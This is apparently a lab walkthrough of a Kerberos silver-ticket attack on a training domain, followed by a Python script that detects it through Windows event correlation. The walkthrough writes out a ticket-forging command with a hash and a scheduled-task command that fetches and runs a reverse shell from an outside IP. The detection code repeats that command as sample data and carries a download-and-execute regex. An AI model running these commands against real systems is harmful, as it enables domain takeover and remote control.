A silver ticket is a forged Kerberos service ticket (TGS) that lets us pretend to be the domain admin towards a single service.
In short, a silver ticket lets you fool whatever service you target and interact with it as a domain admin; the only requirement for it to work is that you have the NTLM hash of the service account you want to use as a domain admin.
The service used to run WinRS and PS Remoting is the HTTP service, and it is worth forging when it comes to the silver ticket attack.
HOST service —> access to scheduled tasks
RPCSS service —> access to WMI
HTTP service —> access to WinRS and PS Remoting
Let’s forge a ticket for the HOST service and use it to execute a reverse shell for us.
.\BetterSafetyKatz.exe '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /service:HOST /target:dcorp-dc.dollarcorp.moneycorp.local /rc4:e9bb4c3d1327e29093dfecab8c2676f6 /startoffset:0 /endin:600 /renewmax:10080 /id:500 /ptt"' "exit"

Now let’s list the tickets in the current session:
klist

Notice that a ticket for the HOST service of the DC is now in our cache.
Now let’s create a scheduled task on the DC that runs a reverse shell for us:
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''http://172.16.100.22/Invoke-PowerShellTcp.ps1''')'"
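
From the defender's side, the chain above leaves two usable traces: a forged service ticket is never requested from the KDC, so the DC records the Kerberos network logon (event 4624, logon type 3) without a matching service ticket request (event 4769), and the scheduled task creation is logged as event 4698 with the task's run-as account and command line. The script below is an added example, not part of the original notes or of any tool mentioned here; it runs both checks over a small set of constructed events. The flattened field names, the ten-minute correlation window and the sample records are assumptions; the event IDs are the standard Windows Security log ones (4698 needs the "Audit Other Object Access Events" subcategory enabled).

```python
"""Triage for the HOST-service silver ticket chain: Kerberos logons with no
KDC ticket request, and scheduled tasks that run download-and-execute code.
All events below are constructed samples with an assumed flattened schema."""
import re
from datetime import datetime, timedelta

# Constructed sample events (assumed field names, modelled on EVTX fields).
EVENTS = [
    # Legitimate: svcadmin asks the KDC for a HOST ticket, then logs on.
    {"id": 4769, "host": "dcorp-dc", "time": "2024-01-01T10:00:00",
     "account": "svcadmin",
     "service": "HOST/dcorp-dc.dollarcorp.moneycorp.local"},
    {"id": 4624, "host": "dcorp-dc", "time": "2024-01-01T10:00:05",
     "account": "svcadmin", "logon_type": 3, "auth_package": "Kerberos"},
    # Legitimate: admin creates a backup task under a normal account.
    {"id": 4698, "host": "dcorp-dc", "time": "2024-01-01T10:05:00",
     "account": "svcadmin", "task_name": "\\NightlyBackup",
     "run_as": "DCORP\\svcadmin",
     "command": "powershell.exe -File C:\\scripts\\backup.ps1"},
    # Silver ticket: Administrator logon on the DC with no 4769 anywhere.
    {"id": 4624, "host": "dcorp-dc", "time": "2024-01-01T11:30:00",
     "account": "Administrator", "logon_type": 3, "auth_package": "Kerberos"},
    # Task created through the forged ticket (command as on the page).
    {"id": 4698, "host": "dcorp-dc", "time": "2024-01-01T11:30:10",
     "account": "Administrator", "task_name": "\\STCheck",
     "run_as": "NT AUTHORITY\\SYSTEM",
     "command": "powershell.exe -c 'IEX(New-Object System.Net.WebClient)"
                ".DownloadString(''http://172.16.100.22/Invoke-PowerShellTcp.ps1''')'"},
]

WINDOW = timedelta(minutes=10)  # assumed: how far back to look for a 4769
DOWNLOAD_EXEC = re.compile(
    r"DownloadString|DownloadFile|IEX|Invoke-Expression|FromBase64String", re.I)


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _service_host(spn):
    """'HOST/dcorp-dc.dollarcorp.moneycorp.local' -> 'dcorp-dc'."""
    return spn.split("/", 1)[-1].split(".", 1)[0].lower()


def kerberos_logons_without_tgs(events, window=WINDOW):
    """4624 Kerberos network logons that no 4769 (same account, service on
    that host, inside `window` before the logon) can account for."""
    requests = [e for e in events if e["id"] == 4769]
    findings = []
    for e in events:
        if (e["id"] != 4624 or e.get("logon_type") != 3
                or e.get("auth_package") != "Kerberos"):
            continue
        t = _ts(e)
        explained = any(
            r["account"].lower() == e["account"].lower()
            and _service_host(r["service"]) == e["host"].lower()
            and t - window <= _ts(r) <= t
            for r in requests)
        if not explained:
            findings.append(e)
    return findings


def suspicious_task_creations(events):
    """4698 events whose action downloads and runs code, or runs as SYSTEM.
    Returns (task_name, creating_account, reasons) tuples."""
    hits = []
    for e in events:
        if e["id"] != 4698:
            continue
        reasons = []
        if DOWNLOAD_EXEC.search(e.get("command", "")):
            reasons.append("download-and-execute action")
        if e.get("run_as", "").upper().endswith("SYSTEM"):
            reasons.append("runs as SYSTEM")
        if reasons:
            hits.append((e["task_name"], e["account"], reasons))
    return hits


def triage(events):
    """Human-readable summary of both checks."""
    lines = [f"{e['time']} {e['host']}: Kerberos logon for {e['account']} "
             "with no matching 4769 (possible forged service ticket)"
             for e in kerberos_logons_without_tgs(events)]
    lines += [f"task {name} created by {who}: {', '.join(why)}"
              for name, who, why in suspicious_task_creations(events)]
    return lines


if __name__ == "__main__":
    for line in triage(EVENTS):
        print(line)
```

The logon/ticket correlation only works when all DCs forward their 4769 events to the same place, since the request may have been served by a different DC than the one the 4624 lands on; the task check is independent of that and also catches the same action when it arrives over a legitimate ticket.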
